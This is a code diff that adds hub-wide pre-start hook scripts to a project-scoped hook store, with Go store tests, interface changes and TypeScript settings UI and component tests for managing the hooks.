+	assert.Equal(t, store.ProjectPreStartHookStatusActive, second.Status)
+
+	reloaded, err := s.GetHubPreStartHook(ctx, first.ID)
+	require.NoError(t, err)
+	assert.Equal(t, store.ProjectPreStartHookStatusArchived, reloaded.Status)
+
+	active, err := s.GetActiveHubPreStartHook(ctx)
+	require.NoError(t, err)
+	assert.Equal(t, second.ID, active.ID)
+}
+
+// =============================================================================
+// Hub scope — slug uniqueness
+// =============================================================================
+
+func TestCreateHubPreStartHook_SlugUniqueWithinHub(t *testing.T) {
+	s := newTestPSHStore(t)
+	ctx := context.Background()
+
+	_, err := s.CreateHubPreStartHook(ctx, &store.ProjectPreStartHook{
+		Name:   "Hook A",
+		Slug:   "my-hook",
+		Script: "#!/bin/sh\n",
+	})
+	require.NoError(t, err)
+
+	_, err = s.CreateHubPreStartHook(ctx, &store.ProjectPreStartHook{
+		Name:   "Hook B",
+		Slug:   "my-hook",
+		Script: "#!/bin/sh\n",
+	})
+	require.ErrorIs(t, err, store.ErrAlreadyExists)
+}
+
+// The same slug may exist at hub scope and project scope simultaneously.
+func TestCreateHubPreStartHook_SlugReusableAcrossScopes(t *testing.T) {
+	s := newTestPSHStore(t)
+	ctx := context.Background()
+
+	_, err := s.CreateProjectPreStartHook(ctx, &store.ProjectPreStartHook{
+		ProjectID: "proj-1",
+		Name:      "Project hook",
+		Slug:      "shared-slug",
+		Script:    "#!/bin/sh\n",
+	})
+	require.NoError(t, err)
+
+	_, err = s.CreateHubPreStartHook(ctx, &store.ProjectPreStartHook{
+		Name:   "Hub hook",
+		Slug:   "shared-slug",
+		Script: "#!/bin/sh\n",
+	})
+	require.NoError(t, err)
+}
+
+// =============================================================================
+// Hub scope — List
+// =============================================================================
+
+func TestListHubPreStartHooks(t *testing.T) {
+	s := newTestPSHStore(t)
+	ctx := context.Background()
+
+	for _, slug := range []string{"hub-a", "hub-b"} {
+		_, err := s.CreateHubPreStartHook(ctx, &store.ProjectPreStartHook{
+			Name:   slug,
+			Slug:   slug,
+			Script: "#!/bin/sh\n",
+		})
+		require.NoError(t, err)
+	}
+	_, err := s.CreateProjectPreStartHook(ctx, &store.ProjectPreStartHook{
+		ProjectID: "proj-1",
+		Name:      "project hook",
+		Slug:      "project-hook",
+		Script:    "#!/bin/sh\n",
+	})
+	require.NoError(t, err)
+
+	hooks, err := s.ListHubPreStartHooks(ctx)
+	require.NoError(t, err)
+	assert.Len(t, hooks, 2)
+	for _, h := range hooks {
+		assert.Equal(t, store.PreStartHookScopeHub, h.Scope)
+		assert.Empty(t, h.ProjectID)
+	}
+}
+
+// =============================================================================
+// Hub scope — Update
+// =============================================================================
+
+func TestUpdateHubPreStartHook(t *testing.T) {
+	s := newTestPSHStore(t)
+	ctx := context.Background()
+
+	created, err := s.CreateHubPreStartHook(ctx, &store.ProjectPreStartHook{
+		Name:   "Original name",
+		Slug:   "my-hook",
+		Script: "#!/bin/sh\necho original\n",
+	})
+	require.NoError(t, err)
+
+	updated, err := s.UpdateHubPreStartHook(ctx, &store.ProjectPreStartHook{
+		ID:        created.ID,
+		Name:      "Updated name",
+		Script:    "#!/bin/sh\necho updated\n",
+		UpdatedBy: "admin@example.com",
+	})
+	require.NoError(t, err)
+	assert.Equal(t, "Updated name", updated.Name)
+	assert.Equal(t, "#!/bin/sh\necho updated\n", updated.Script)
+	assert.Equal(t, "admin@example.com", updated.UpdatedBy)
+	assert.Equal(t, store.PreStartHookScopeHub, updated.Scope)
+	// Status must not change.
+	assert.Equal(t, store.ProjectPreStartHookStatusActive, updated.Status)
+}
+
+// A project-scoped hook cannot be mutated through the hub-scoped API.
+func TestUpdateHubPreStartHook_RejectsProjectScopedHook(t *testing.T) {
+	s := newTestPSHStore(t)
+	ctx := context.Background()
+
+	created, err := s.CreateProjectPreStartHook(ctx, &store.ProjectPreStartHook{
+		ProjectID: "proj-1",
+		Name:      "Project hook",
+		Slug:      "project-hook",
+		Script:    "#!/bin/sh\n",
+	})
+	require.NoError(t, err)
+
+	_, err = s.UpdateHubPreStartHook(ctx, &store.ProjectPreStartHook{
+		ID:   created.ID,
+		Name: "Hijacked",
+	})
+	assert.ErrorIs(t, err, store.ErrNotFound)
+}
+
+// =============================================================================
+// Hub scope — Activate
+// =============================================================================
+
+func TestActivateHubPreStartHook(t *testing.T) {
+	s := newTestPSHStore(t)
+	ctx := context.Background()
+
+	first, err := s.CreateHubPreStartHook(ctx, &store.ProjectPreStartHook{
+		Name:   "First",
+		Slug:   "first",
+		Script: "#!/bin/sh\n",
+	})
+	require.NoError(t, err)
+
+	second, err := s.CreateHubPreStartHook(ctx, &store.ProjectPreStartHook{
+		Name:   "Second",
+		Slug:   "second",
+		Script: "#!/bin/sh\n",
+	})
+	require.NoError(t, err)
+	assert.Equal(t, store.ProjectPreStartHookStatusActive, second.Status)
+
+	// Re-activate first; second must become archived.
+	activated, err := s.ActivateHubPreStartHook(ctx, first.ID)
+	require.NoError(t, err)
+	assert.Equal(t, first.ID, activated.ID)
+	assert.Equal(t, store.ProjectPreStartHookStatusActive, activated.Status)
+
+	reloadedSecond, err := s.GetHubPreStartHook(ctx, second.ID)
+	require.NoError(t, err)
+	assert.Equal(t, store.ProjectPreStartHookStatusArchived, reloadedSecond.Status)
+
+	active, err := s.GetActiveHubPreStartHook(ctx)
+	require.NoError(t, err)
+	assert.Equal(t, first.ID, active.ID)
+}
+
+// Activating a project-scoped hook through the hub API must fail, and must not
+// archive the active hub hook as a side effect.
+func TestActivateHubPreStartHook_RejectsProjectScopedHook(t *testing.T) {
+	s := newTestPSHStore(t)
+	ctx := context.Background()
+
+	projectHook, err := s.CreateProjectPreStartHook(ctx, &store.ProjectPreStartHook{
+		ProjectID: "proj-1",
+		Name:      "Project hook",
+		Slug:      "project-hook",
+		Script:    "#!/bin/sh\n",
+	})
+	require.NoError(t, err)
+
+	hubHook, err := s.CreateHubPreStartHook(ctx, &store.ProjectPreStartHook{
+		Name:   "Hub hook",
+		Slug:   "hub-hook",
+		Script: "#!/bin/sh\n",
+	})
+	require.NoError(t, err)
+
+	_, err = s.ActivateHubPreStartHook(ctx, projectHook.ID)
+	assert.ErrorIs(t, err, store.ErrNotFound)
+
+	// The transaction rolled back: the hub hook is still active.
+	active, err := s.GetActiveHubPreStartHook(ctx)
+	require.NoError(t, err)
+	assert.Equal(t, hubHook.ID, active.ID)
+
+	// And the project hook is untouched.
+	reloaded, err := s.GetProjectPreStartHook(ctx, projectHook.ID, "proj-1")
+	require.NoError(t, err)
+	assert.Equal(t, store.ProjectPreStartHookStatusActive, reloaded.Status)
+}
+
+// =============================================================================
+// Hub scope — Delete
+// =============================================================================
+
+func TestDeleteHubPreStartHook_Active_WithOtherHooks_Rejected(t *testing.T) {
+	s := newTestPSHStore(t)
+	ctx := context.Background()
+
+	_, err := s.CreateHubPreStartHook(ctx, &store.ProjectPreStartHook{
+		Name:   "First",
+		Slug:   "first",
+		Script: "#!/bin/sh\n",
+	})
+	require.NoError(t, err)
+
+	second, err := s.CreateHubPreStartHook(ctx, &store.ProjectPreStartHook{
+		Name:   "Second",
+		Slug:   "second",
+		Script: "#!/bin/sh\n",
+	})
+	require.NoError(t, err)
+	assert.Equal(t, store.ProjectPreStartHookStatusActive, second.Status)
+
+	err = s.DeleteHubPreStartHook(ctx, second.ID)
+	assert.ErrorIs(t, err, store.ErrInvalidInput)
+}
+
+func TestDeleteHubPreStartHook_OnlyActive_Succeeds(t *testing.T) {
+	s := newTestPSHStore(t)
+	ctx := context.Background()
+
+	// Mirrors the project-scope semantic: deleting the last remaining hook is
+	// allowed so operators can fully clear the hub hook.
+	hook, err := s.CreateHubPreStartHook(ctx, &store.ProjectPreStartHook{
+		Name:   "Only",
+		Slug:   "only",
+		Script: "#!/bin/sh\n",
+	})
+	require.NoError(t, err)
+
+	require.NoError(t, s.DeleteHubPreStartHook(ctx, hook.ID))
+
+	_, err = s.GetHubPreStartHook(ctx, hook.ID)
+	assert.ErrorIs(t, err, store.ErrNotFound)
+}
+
+func TestDeleteHubPreStartHook_Archived(t *testing.T) {
+	s := newTestPSHStore(t)
+	ctx := context.Background()
+
+	first, err := s.CreateHubPreStartHook(ctx, &store.ProjectPreStartHook{
+		Name:   "First",
+		Slug:   "first",
+		Script: "#!/bin/sh\n",
+	})
+	require.NoError(t, err)
+	_, err = s.CreateHubPreStartHook(ctx, &store.ProjectPreStartHook{
+		Name:   "Second",
+		Slug:   "second",
+		Script: "#!/bin/sh\n",
+	})
+	require.NoError(t, err)
+
+	// first is now archived — deletion should succeed.
+	require.NoError(t, s.DeleteHubPreStartHook(ctx, first.ID))
+
+	_, err = s.GetHubPreStartHook(ctx, first.ID)
+	assert.ErrorIs(t, err, store.ErrNotFound)
+}
+
+// A project-scoped hook must not be deletable through the hub API.
+func TestDeleteHubPreStartHook_RejectsProjectScopedHook(t *testing.T) {
+	s := newTestPSHStore(t)
+	ctx := context.Background()
+
+	hook, err := s.CreateProjectPreStartHook(ctx, &store.ProjectPreStartHook{
+		ProjectID: "proj-1",
+		Name:      "Project hook",
+		Slug:      "project-hook",
+		Script:    "#!/bin/sh\n",
+	})
+	require.NoError(t, err)
+
+	err = s.DeleteHubPreStartHook(ctx, hook.ID)
+	assert.ErrorIs(t, err, store.ErrNotFound)
+
+	// Still there.
+	_, err = s.GetProjectPreStartHook(ctx, hook.ID, "proj-1")
+	require.NoError(t, err)
+}
+
+// =============================================================================
+// Scope isolation — hub and project rows never interfere
+// =============================================================================
+
+func TestPreStartHookScopeIsolation(t *testing.T) {
+	s := newTestPSHStore(t)
+	ctx := context.Background()
+
+	projectHook, err := s.CreateProjectPreStartHook(ctx, &store.ProjectPreStartHook{
+		ProjectID: "proj-1",
+		Name:      "Project hook",
+		Slug:      "project-hook",
+		Script:    "#!/bin/sh\necho project\n",
+	})
+	require.NoError(t, err)
+	assert.Equal(t, store.PreStartHookScopeProject, projectHook.Scope)
+
+	hubHook, err := s.CreateHubPreStartHook(ctx, &store.ProjectPreStartHook{
+		Name:   "Hub hook",
+		Slug:   "hub-hook",
+		Script: "#!/bin/sh\necho hub\n",
+	})
+	require.NoError(t, err)
+
+	// Creating a hub hook must NOT archive the project hook, and vice versa —
+	// both scopes hold an active hook simultaneously.
+	activeProject, err := s.GetActiveProjectPreStartHook(ctx, "proj-1")
+	require.NoError(t, err)
+	assert.Equal(t, projectHook.ID, activeProject.ID)
+	assert.Equal(t, store.ProjectPreStartHookStatusActive, activeProject.Status)
+
+	activeHub, err := s.GetActiveHubPreStartHook(ctx)
+	require.NoError(t, err)
+	assert.Equal(t, hubHook.ID, activeHub.ID)
+
+	// Listing project hooks must not surface the hub hook.
+	projectHooks, err := s.ListProjectPreStartHooks(ctx, "proj-1")
+	require.NoError(t, err)
+	require.Len(t, projectHooks, 1)
+	assert.Equal(t, projectHook.ID, projectHooks[0].ID)
+
+	// Listing hub hooks must not surface the project hook.
+	hubHooks, err := s.ListHubPreStartHooks(ctx)
+	require.NoError(t, err)
+	require.Len(t, hubHooks, 1)
+	assert.Equal(t, hubHook.ID, hubHooks[0].ID)
+
+	// Cross-scope gets by ID must fail.
+	_, err = s.GetHubPreStartHook(ctx, projectHook.ID)
+	assert.ErrorIs(t, err, store.ErrNotFound)
+	_, err = s.GetProjectPreStartHook(ctx, hubHook.ID, "proj-1")
+	assert.ErrorIs(t, err, store.ErrNotFound)
+
+	// A hub hook must never be reachable via the empty project ID either.
+	_, err = s.GetActiveProjectPreStartHook(ctx, "")
+	assert.ErrorIs(t, err, store.ErrNotFound)
+	emptyProjectHooks, err := s.ListProjectPreStartHooks(ctx, "")
+	require.NoError(t, err)
+	assert.Empty(t, emptyProjectHooks)
+}
+
+// Archiving/activating within one scope must leave the other scope alone.
+func TestPreStartHookScopeIsolation_ActivateDoesNotCrossScopes(t *testing.T) {
+	s := newTestPSHStore(t)
+	ctx := context.Background()
+
+	hubFirst, err := s.CreateHubPreStartHook(ctx, &store.ProjectPreStartHook{
+		Name:   "Hub first",
+		Slug:   "hub-first",
+		Script: "#!/bin/sh\n",
+	})
+	require.NoError(t, err)
+	_, err = s.CreateHubPreStartHook(ctx, &store.ProjectPreStartHook{
+		Name:   "Hub second",
+		Slug:   "hub-second",
+		Script: "#!/bin/sh\n",
+	})
+	require.NoError(t, err)
+
+	projectHook, err := s.CreateProjectPreStartHook(ctx, &store.ProjectPreStartHook{
+		ProjectID: "proj-1",
+		Name:      "Project hook",
+		Slug:      "project-hook",
+		Script:    "#!/bin/sh\n",
+	})
+	require.NoError(t, err)
+
+	// Activating an older hub hook must not touch the project hook.
+	_, err = s.ActivateHubPreStartHook(ctx, hubFirst.ID)
+	require.NoError(t, err)
+
+	stillActive, err := s.GetProjectPreStartHook(ctx, projectHook.ID, "proj-1")
+	require.NoError(t, err)
+	assert.Equal(t, store.ProjectPreStartHookStatusActive, stillActive.Status)
+
+	// And creating another project hook must not touch the active hub hook.
+	_, err = s.CreateProjectPreStartHook(ctx, &store.ProjectPreStartHook{
+		ProjectID: "proj-1",
+		Name:      "Project hook 2",
+		Slug:      "project-hook-2",
+		Script:    "#!/bin/sh\n",
+	})
+	require.NoError(t, err)
+
+	activeHub, err := s.GetActiveHubPreStartHook(ctx)
+	require.NoError(t, err)
+	assert.Equal(t, hubFirst.ID, activeHub.ID)
+}

--- a/pkg/store/project_pre_start_hook.go
+++ b/pkg/store/project_pre_start_hook.go
@@ -25,12 +25,28 @@ const (
 	ProjectPreStartHookStatusArchived = "archived"
 )
 
-// ProjectPreStartHook is a named shell script registered against a project.
-// When an agent is created in the project the active hook's script content is
-// inlined into AgentAppliedConfig and later staged by the broker at
-// $HOME/.scion/hooks/pre-start.d/30-project-custom before the container starts.
+// Pre-start hook scope constants. A hook is either attached to a single
+// project ("project") or to the hub as a whole ("hub"). The hub-scoped hook
+// acts as the fallback for projects that have no active project-scoped hook.
+const (
+	PreStartHookScopeProject = "project"
+	PreStartHookScopeHub     = "hub"
+)
+
+// ProjectPreStartHook is a named shell script registered against a project or
+// against the hub as a whole. When an agent is created the active hook's
+// script content is inlined into AgentAppliedConfig and later staged by the
+// broker at $HOME/.scion/hooks/pre-start.d/30-project-custom before the
+// container starts.
+//
+// Scope selects between the two flavours: "project" hooks carry a ProjectID
+// and apply to that project only; "hub" hooks have an empty ProjectID and
+// apply to every project that has no active project-scoped hook.
 type ProjectPreStartHook struct {
-	ID          string `json:"id"`
+	ID string `json:"id"`
+	// Scope is "project" or "hub". Empty is treated as "project" by the
+	// store layer for backwards compatibility.
+	Scope       string `json:"scope"`
 	ProjectID   string `json:"projectId"`
 	Name        string `json:"name"`
 	Slug        string `json:"slug"`
@@ -74,4 +90,41 @@ type ProjectPreStartHookStore interface {
 	// DeleteProjectPreStartHook hard-deletes a hook. Returns store.ErrInvalidInput
 	// if the hook is currently active (caller must archive it first).
 	DeleteProjectPreStartHook(ctx context.Context, hookID, projectID string) error
+
+	// --- Hub-scoped hooks -------------------------------------------------
+	//
+	// Hub-scoped hooks live in the same table with scope="hub" and an empty
+	// project_id. They never appear in the project-scoped methods above, and
+	// project-scoped hooks never appear in the methods below.
+
+	// GetActiveHubPreStartHook returns the single active hub-scoped hook.
+	// Returns store.ErrNotFound if no active hub hook is registered.
+	GetActiveHubPreStartHook(ctx context.Context) (*ProjectPreStartHook, error)
+
+	// GetHubPreStartHook returns a specific hub-scoped hook by ID.
+	// Returns store.ErrNotFound if the ID does not identify a hub-scoped hook.
+	GetHubPreStartHook(ctx context.Context, hookID string) (*ProjectPreStartHook, error)
+
+	// ListHubPreStartHooks returns all hub-scoped hooks (all statuses),
+	// ordered by creation time descending.
+	ListHubPreStartHooks(ctx context.Context) ([]*ProjectPreStartHook, error)
+
+	// CreateHubPreStartHook creates a new hub-scoped hook and archives any
+	// existing active hub-scoped hook atomically.
+	CreateHubPreStartHook(ctx context.Context, hook *ProjectPreStartHook) (*ProjectPreStartHook, error)
+
+	// UpdateHubPreStartHook updates the mutable fields of a hub-scoped hook
+	// (name, description, script). Does not change status; call
+	// ActivateHubPreStartHook to change status.
+	UpdateHubPreStartHook(ctx context.Context, hook *ProjectPreStartHook) (*ProjectPreStartHook, error)
+
+	// ActivateHubPreStartHook sets the identified hub-scoped hook to "active"
+	// and archives all other hub-scoped hooks atomically.
+	ActivateHubPreStartHook(ctx context.Context, hookID string) (*ProjectPreStartHook, error)
+
+	// DeleteHubPreStartHook hard-deletes a hub-scoped hook. Returns
+	// store.ErrInvalidInput if the hook is currently active and other
+	// hub-scoped hooks exist (activate another hook first). Deleting the last
+	// remaining hub hook is allowed so operators can fully clear the hub hook.
+	DeleteHubPreStartHook(ctx context.Context, hookID string) error
 }

--- a/pkg/store/project_pre_start_hook.go
+++ b/pkg/store/project_pre_start_hook.go
@@ -87,8 +87,11 @@ type ProjectPreStartHookStore interface {
 	// archives all other hooks for the same project atomically.
 	ActivateProjectPreStartHook(ctx context.Context, hookID, projectID string) (*ProjectPreStartHook, error)
 
-	// DeleteProjectPreStartHook hard-deletes a hook. Returns store.ErrInvalidInput
-	// if the hook is currently active (caller must archive it first).
+	// DeleteProjectPreStartHook hard-deletes a project-scoped hook.
+	// Returns store.ErrInvalidInput if the hook is active and other hooks exist
+	// in the same project scope (activate another hook first). Deleting the last
+	// active hook (when it is the sole hook) is permitted so that operators can
+	// fully clear a project's pre-start hooks.
 	DeleteProjectPreStartHook(ctx context.Context, hookID, projectID string) error
 
 	// --- Hub-scoped hooks -------------------------------------------------

--- a/pkg/templatecache/hydrator_test.go
+++ b/pkg/templatecache/hydrator_test.go
@@ -130,6 +130,7 @@ func (m *mockHubClient) UserInjectedSkills() hubclient.InjectedSkillsService { r
 func (m *mockHubClient) ProjectPreStartHooks(projectID string) hubclient.ProjectPreStartHookService {
 	return nil
 }
+func (m *mockHubClient) HubPreStartHooks() hubclient.HubPreStartHookService { return nil }
 func (m *mockHubClient) Health(ctx context.Context) (*hubclient.HealthResponse, error) {
 	return nil, nil
 }

--- a/web/src/components/index.ts
+++ b/web/src/components/index.ts
@@ -24,7 +24,7 @@
 export { ScionApp } from './app-shell.js';
 
 // Shared components
-export { ScionNav, ScionHeader, ScionBreadcrumb, ScionStatusBadge, ScionViewToggle } from './shared/index.js';
+export { ScionNav, ScionHeader, ScionBreadcrumb, ScionStatusBadge, ScionViewToggle, ScionPreStartHookList } from './shared/index.js';
 export type { StatusType } from './shared/index.js';
 export type { ViewMode } from './shared/index.js';
 

--- a/web/src/components/pages/project-settings.ts
+++ b/web/src/components/pages/project-settings.ts
@@ -23,7 +23,7 @@
 import { LitElement, html, css } from 'lit';
 import { customElement, property, state } from 'lit/decorators.js';
 
-import type { PageData, Project, Template, AdminGroup, GitHubAppProjectStatus, GitHubTokenPermissions, RuntimeBroker, BrokerProfile, GCPServiceAccount } from '../../shared/types.js';
+import type { PageData, Project, Template, AdminGroup, GitHubAppProjectStatus, GitHubTokenPermissions, RuntimeBroker, BrokerProfile, GCPServiceAccount, PreStartHook, PreStartHookSummary } from '../../shared/types.js';
 import { can, canAny } from '../../shared/types.js';
 import { normalizeModelAlias } from '../../shared/model-utils.js';
 import { apiFetch, extractApiError } from '../../client/api.js';
@@ -39,6 +39,7 @@ import '../shared/schedule-list.js';
 import '../shared/resource-list.js';
 import '../shared/resource-import.js';
 import '../shared/injected-skills-panel.js';
+import '../shared/pre-start-hook-list.js';
 
 
 interface ProjectResourceSpec {
@@ -121,6 +122,10 @@ export class ScionPageProjectSettings extends LitElement {
 
   @state()
   private activeSchedulesTab = 'events';
+
+  /** Active hub-scoped pre-start hook, used for the "inherited from hub" banner. */
+  @state()
+  private hubHook: PreStartHookSummary | null = null;
 
   @state()
   private dropdownTemplates: Template[] = [];
@@ -740,6 +745,7 @@ export class ScionPageProjectSettings extends LitElement {
       }
     }
     void this.loadProject().then(() => this.loadMembersGroup());
+    void this.loadHubPreStartHook();
     void this.loadDropdownTemplates();
     void this.loadSettings();
     void this.loadHubTelemetryDefault();
@@ -785,6 +791,28 @@ export class ScionPageProjectSettings extends LitElement {
       this.error = err instanceof Error ? err.message : 'Failed to load project';
     } finally {
       this.loading = false;
+    }
+  }
+
+  /**
+   * Loads the active hub-scoped pre-start hook for the inherited indicator.
+   * This is best-effort: if the endpoint is forbidden or unavailable the banner
+   * simply does not render.
+   */
+  private async loadHubPreStartHook(): Promise<void> {
+    try {
+      const response = await apiFetch('/api/v1/pre-start-hooks?status=active&limit=1');
+      if (!response.ok) {
+        this.hubHook = null;
+        return;
+      }
+      const data = (await response.json()) as { hooks?: PreStartHook[] } | PreStartHook[];
+      const hooks = Array.isArray(data) ? data : data.hooks || [];
+      // Filter client-side as well, so the banner stays correct even if the
+      // endpoint ignores the status query parameter.
+      this.hubHook = hooks.find((h) => h.status === 'active') ?? null;
+    } catch {
+      this.hubHook = null;
     }
   }
 
@@ -1836,6 +1864,7 @@ export class ScionPageProjectSettings extends LitElement {
           <sl-tab slot="nav" panel="shared-dirs" ?active=${this.activeResourcesTab === 'shared-dirs'}>Shared Directories</sl-tab>
           <sl-tab slot="nav" panel="templates" ?active=${this.activeResourcesTab === 'templates'}>Templates</sl-tab>
           <sl-tab slot="nav" panel="harness-configs" ?active=${this.activeResourcesTab === 'harness-configs'}>Harness Configs</sl-tab>
+          <sl-tab slot="nav" panel="pre-start-hooks" ?active=${this.activeResourcesTab === 'pre-start-hooks'}>Pre-Start Hooks</sl-tab>
           <sl-tab slot="nav" panel="gcp-sa" ?active=${this.activeResourcesTab === 'gcp-sa'}>GCP Service Accounts</sl-tab>
           <sl-tab slot="nav" panel="skills" ?active=${this.activeResourcesTab === 'skills'}>Skills</sl-tab>
 
@@ -1868,6 +1897,10 @@ export class ScionPageProjectSettings extends LitElement {
 
           <sl-tab-panel name="harness-configs">
             ${this.renderHarnessConfigsContent()}
+          </sl-tab-panel>
+
+          <sl-tab-panel name="pre-start-hooks">
+            ${this.renderPreStartHooksContent()}
           </sl-tab-panel>
 
           <sl-tab-panel name="gcp-sa">
@@ -1955,6 +1988,25 @@ export class ScionPageProjectSettings extends LitElement {
         ?cloneFromGlobal=${canSync}
         @resource-changed=${() => this.refreshHarnessConfigsList()}
       ></scion-resource-list>
+    `;
+  }
+
+  private renderPreStartHooksContent() {
+    const canEdit = canAny(this.project!._capabilities, 'update', 'manage');
+    return html`
+      <div class="section-header" style="margin-bottom: 1rem;">
+        <div class="section-header-text">
+          <p style="margin: 0;">
+            Project-scoped pre-start scripts staged before each agent container starts.
+            A project hook overrides the hub-wide default.
+          </p>
+        </div>
+      </div>
+      <scion-pre-start-hook-list
+        apiBasePath="/api/v1/projects/${this.projectId}"
+        ?readonly=${!canEdit}
+        .inheritedHook=${this.hubHook}
+      ></scion-pre-start-hook-list>
     `;
   }
 

--- a/web/src/components/pages/settings.ts
+++ b/web/src/components/pages/settings.ts
@@ -23,18 +23,29 @@
  */
 
 import { LitElement, html, css } from 'lit';
-import { customElement, state } from 'lit/decorators.js';
+import { customElement, property, state } from 'lit/decorators.js';
 
+import type { PageData } from '../../shared/types.js';
 import '../shared/env-var-list.js';
 import '../shared/secret-list.js';
 import '../shared/resource-list.js';
 import '../shared/resource-import.js';
 import '../shared/injected-skills-panel.js';
+import '../shared/pre-start-hook-list.js';
 
 @customElement('scion-page-settings')
 export class ScionPageSettings extends LitElement {
+  /** Page data from the router (used for the current user's role). */
+  @property({ type: Object })
+  pageData: PageData | null = null;
+
   @state()
   private activeTab = 'env-vars';
+
+  /** Hub admins get mutating affordances; everyone else sees a read-only list. */
+  private get isAdmin(): boolean {
+    return this.pageData?.user?.role === 'admin';
+  }
 
   static override styles = css`
     :host {
@@ -146,6 +157,12 @@ export class ScionPageSettings extends LitElement {
           <sl-tab slot="nav" panel="harness-configs" ?active=${this.activeTab === 'harness-configs'}
             >Harness Configs</sl-tab
           >
+          <sl-tab
+            slot="nav"
+            panel="pre-start-hooks"
+            ?active=${this.activeTab === 'pre-start-hooks'}
+            >Pre-Start Hooks</sl-tab
+          >
           <sl-tab slot="nav" panel="skills" ?active=${this.activeTab === 'skills'}
             >Skills</sl-tab
           >
@@ -196,6 +213,17 @@ export class ScionPageSettings extends LitElement {
               canDelete
               @resource-changed=${() => this.refreshList('harness-configs-list')}
             ></scion-resource-list>
+          </sl-tab-panel>
+
+          <sl-tab-panel name="pre-start-hooks">
+            <p class="tab-intro">
+              Hub-wide default pre-start hook. Staged for any agent whose project has no
+              project-level hook active.
+            </p>
+            <scion-pre-start-hook-list
+              apiBasePath="/api/v1"
+              ?readonly=${!this.isAdmin}
+            ></scion-pre-start-hook-list>
           </sl-tab-panel>
 
           <sl-tab-panel name="skills">

--- a/web/src/components/shared/index.ts
+++ b/web/src/components/shared/index.ts
@@ -46,3 +46,4 @@ export { ScionGCPServiceAccountList } from './gcp-service-account-list.js';
 export { ScionSubscriptionManager } from './subscription-manager.js';
 export { ScionGitRemoteDisplay } from './git-remote-display.js';
 export { ScionHashDisplay } from './hash-display.js';
+export { ScionPreStartHookList } from './pre-start-hook-list.js';

--- a/web/src/components/shared/pre-start-hook-list.test.ts
+++ b/web/src/components/shared/pre-start-hook-list.test.ts
@@ -1,0 +1,322 @@
+/**
+ * Copyright 2026 Google LLC
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *     http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+/**
+ * Tests for pre-start-hook-list.ts.
+ *
+ * Covers the behaviours the two page surfaces depend on:
+ *  1. The list is fetched from `{apiBasePath}/pre-start-hooks` (project or hub).
+ *  2. The "inherited from hub" banner appears only when no project hook is active.
+ *  3. Create derives the slug from the name and POSTs to the collection URL.
+ *  4. The 64 KB script limit is enforced client-side (no network call).
+ *  5. Activate / delete hit the documented endpoints and refresh the list.
+ *  6. `readonly` suppresses all mutating affordances.
+ */
+
+// @vitest-environment happy-dom
+
+import { describe, it, expect, vi, beforeAll, afterEach } from 'vitest';
+
+/* eslint-disable @typescript-eslint/no-explicit-any */
+
+let ScionPreStartHookList: any;
+
+interface RecordedCall {
+  url: string;
+  method: string;
+  body?: Record<string, unknown>;
+}
+
+const HOOK_ACTIVE = {
+  id: 'hook-1',
+  scope: 'project',
+  projectId: 'proj-1',
+  name: 'Install tools',
+  slug: 'install-tools',
+  description: 'installs build tools',
+  script: '#!/bin/sh\necho hi\n',
+  status: 'active',
+  created: '2026-07-25T10:00:00Z',
+  updated: '2026-07-25T10:00:00Z',
+};
+
+const HOOK_ARCHIVED = {
+  ...HOOK_ACTIVE,
+  id: 'hook-2',
+  name: 'Old setup',
+  slug: 'old-setup',
+  status: 'archived',
+};
+
+/** Installs a fetch mock that serves `hooks` on GET and 200/204 on mutations. */
+function installFetch(hooks: unknown[], calls: RecordedCall[]): void {
+  vi.stubGlobal(
+    'fetch',
+    vi.fn((url: string | URL | Request, init?: RequestInit): Promise<Response> => {
+      const method = init?.method ?? 'GET';
+      const href = String(url);
+      let body: Record<string, unknown> | undefined;
+      if (typeof init?.body === 'string') {
+        try {
+          body = JSON.parse(init.body) as Record<string, unknown>;
+        } catch {
+          /* ignore */
+        }
+      }
+      calls.push({ url: href, method, body });
+
+      if (method === 'GET') {
+        return Promise.resolve(
+          new Response(JSON.stringify({ hooks }), {
+            status: 200,
+            headers: { 'Content-Type': 'application/json' },
+          })
+        );
+      }
+      if (method === 'DELETE') {
+        return Promise.resolve(new Response(null, { status: 204 }));
+      }
+      return Promise.resolve(
+        new Response(JSON.stringify(HOOK_ACTIVE), {
+          status: 200,
+          headers: { 'Content-Type': 'application/json' },
+        })
+      );
+    })
+  );
+}
+
+/** Creates the element, attaches it, and lets the initial load settle. */
+async function createComponent(
+  hooks: unknown[],
+  calls: RecordedCall[],
+  apiBasePath = '/api/v1/projects/proj-1'
+): Promise<any> {
+  installFetch(hooks, calls);
+  const el = document.createElement('scion-pre-start-hook-list') as any;
+  el.setAttribute('apiBasePath', apiBasePath);
+  document.body.appendChild(el);
+  await el.updateComplete;
+  await new Promise((r) => setTimeout(r, 50));
+  await el.updateComplete;
+  return el;
+}
+
+function text(el: any): string {
+  return el.shadowRoot?.textContent ?? '';
+}
+
+describe('scion-pre-start-hook-list', () => {
+  beforeAll(async () => {
+    const mod = await import('./pre-start-hook-list.js');
+    ScionPreStartHookList = mod.ScionPreStartHookList;
+    expect(ScionPreStartHookList).toBeDefined();
+  });
+
+  afterEach(() => {
+    document.body.innerHTML = '';
+    vi.restoreAllMocks();
+  });
+
+  it('loads hooks from the scoped collection endpoint and renders them', async () => {
+    const calls: RecordedCall[] = [];
+    const el = await createComponent([HOOK_ACTIVE, HOOK_ARCHIVED], calls);
+
+    expect(calls[0].url).toBe('/api/v1/projects/proj-1/pre-start-hooks');
+    expect(el.hooks).toHaveLength(2);
+    const rendered = text(el);
+    expect(rendered).toContain('Install tools');
+    expect(rendered).toContain('install-tools');
+    expect(rendered).toContain('archived');
+  });
+
+  it('uses the hub base path when configured for hub scope', async () => {
+    const calls: RecordedCall[] = [];
+    await createComponent([], calls, '/api/v1');
+    expect(calls[0].url).toBe('/api/v1/pre-start-hooks');
+  });
+
+  it('shows the inherited-from-hub banner only when no project hook is active', async () => {
+    const calls: RecordedCall[] = [];
+    const el = await createComponent([HOOK_ARCHIVED], calls);
+    el.inheritedHook = {
+      id: 'hub-1',
+      name: 'baseline-setup',
+      slug: 'baseline-setup',
+      scope: 'hub',
+      status: 'active',
+    };
+    await el.updateComplete;
